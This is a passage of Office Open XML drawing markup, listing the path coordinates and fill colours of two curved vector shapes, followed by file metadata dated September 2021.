                    <a:pt x="943177" y="666971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984136" y="648614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026638" y="633288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070551" y="621129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115741" y="612275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162075" y="606862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="605027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258328" y="605027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248339" y="587717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224057" y="549074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198381" y="511428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2171347" y="474813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2142991" y="439267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113351" y="404825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2082461" y="371525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2050359" y="339402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2017080" y="308492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1982661" y="278832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947137" y="250458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910546" y="223406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1872923" y="197713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1834305" y="173414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1794727" y="150547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754227" y="129147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712840" y="109251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670602" y="90894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1627550" y="74114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583721" y="58946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1539149" y="45426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493872" y="33592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1447925" y="23479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401345" y="15123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354169" y="8561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306432" y="3829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258170" y="963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FCAC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171688" y="5789676"/>
              <a:ext cx="2426335" cy="2423160"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2426334" h="2423159">
                  <a:moveTo>
                    <a:pt x="1246885" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1243281" y="51755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1237695" y="103071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1230142" y="153910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1220639" y="204232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209201" y="254001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195843" y="303178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180582" y="351725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163432" y="399603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1144410" y="446775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123531" y="493202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100811" y="538846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1076265" y="583669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049908" y="627634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1088820" y="618154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1129363" y="611044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170977" y="606577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213103" y="605028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260484" y="606844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306852" y="612204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352074" y="620974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1396017" y="633022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1438548" y="648214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479533" y="666417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1518840" y="687498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556334" y="711323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1591883" y="737759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625354" y="766673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1656613" y="797932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685527" y="831403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711963" y="866952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1735788" y="904446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756869" y="943753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1775072" y="984738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1790264" y="1027269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802312" y="1071212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1811082" y="1116434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1816442" y="1162802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818258" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1816442" y="1257562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1811082" y="1303928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802312" y="1349146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1790264" y="1393084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1775072" y="1435609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756869" y="1476587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1735788" y="1515886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711963" y="1553372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685527" y="1588912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1656613" y="1622374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625354" y="1653624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1591883" y="1682529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556334" y="1708957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1518840" y="1732773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479533" y="1753846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1438548" y="1772042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1396017" y="1787228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352074" y="1799271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306852" y="1808037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260484" y="1813395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213103" y="1815211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165723" y="1813395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1119355" y="1808037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074133" y="1799271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030190" y="1787228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987659" y="1772042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946674" y="1753846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907367" y="1732773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869873" y="1708957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834324" y="1682529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800853" y="1653624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="769594" y="1622374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740680" y="1588912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714244" y="1553372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690419" y="1515886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669338" y="1476587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651135" y="1435609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635943" y="1393084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623895" y="1349146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615125" y="1303928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609765" y="1257562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607948" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610291" y="1156001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617186" y="1103296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628435" y="1052234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643842" y="1002982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663207" y="955706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686333" y="910574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713022" y="867751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743076" y="827405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298322" y="413766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266303" y="452171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235852" y="491873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207019" y="532824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179851" y="574974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154396" y="618276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130702" y="662682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108817" y="708143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88788" y="754611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70665" y="802038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54494" y="850376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40324" y="899575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28202" y="949589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18177" y="1000369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296" y="1051867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4608" y="1104034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160" y="1156822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963" y="1258960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3829" y="1307249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8561" y="1355014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15123" y="1402219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23479" y="1448826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33592" y="1494800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45427" y="1540104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58947" y="1584703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74115" y="1628559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90896" y="1671637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109253" y="1713901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129150" y="1755314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150551" y="1795840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173419" y="1835442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197719" y="1874085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223413" y="1911731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250467" y="1948346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278842" y="1983892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308504" y="2018334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339416" y="2051634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371542" y="2083757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404845" y="2114667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439289" y="2144327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474838" y="2172701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511456" y="2199753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549107" y="2225446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587753" y="2249745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627360" y="2272612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667890" y="2294012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709308" y="2313908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751576" y="2332265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="794660" y="2349045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838523" y="2364213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="883127" y="2377733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="928438" y="2389567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="974419" y="2399680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021034" y="2408036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068246" y="2414598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1116019" y="2419330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164317" y="2422196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213103" y="2423160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1261890" y="2422196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1310188" y="2419330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1357961" y="2414598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1405173" y="2408036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1451788" y="2399680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1497769" y="2389567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543080" y="2377733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1587684" y="2364213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1631547" y="2349045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1674631" y="2332265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716899" y="2313908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1758317" y="2294012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798847" y="2272612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838454" y="2249745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1877100" y="2225446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1914751" y="2199753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951369" y="2172701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1986918" y="2144327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2021362" y="2114667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054665" y="2083757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2086791" y="2051634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2117703" y="2018334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147365" y="1983892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2175740" y="1948346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2202794" y="1911731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2228488" y="1874085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2252788" y="1835442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2275656" y="1795840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2297057" y="1755314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2316954" y="1713901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2335311" y="1671637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2352092" y="1628559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367260" y="1584703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2380780" y="1540104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2392615" y="1494800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402728" y="1448826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2411084" y="1402219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417646" y="1355014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2422378" y="1307249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2425244" y="1258960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2426207" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2425274" y="1162218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2422497" y="1114729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417911" y="1067752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2411551" y="1021320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2403451" y="975468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393647" y="930229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2382173" y="885639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2369064" y="841731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2354355" y="798540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338081" y="756099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2320275" y="714444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2300974" y="673609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2280212" y="633627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258024" y="594534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2234444" y="556363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2209507" y="519148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2183248" y="482925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155702" y="447727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126904" y="413588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096888" y="380543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2065689" y="348627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033342" y="317873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1999882" y="288315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1965344" y="259988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1929762" y="232927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1893170" y="207165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855605" y="182738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1817101" y="159678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777691" y="138020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737412" y="117800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1696298" y="99050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654384" y="81806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1611705" y="66101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1568294" y="51970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524188" y="39447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479421" y="28566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1434027" y="19362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1388042" y="11869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1341500" y="6122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1294436" y="2154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1246885" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FCB3B4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3E3E3E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2021-09-16T16:19:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-16T16:19:35Z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2021-09-16T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>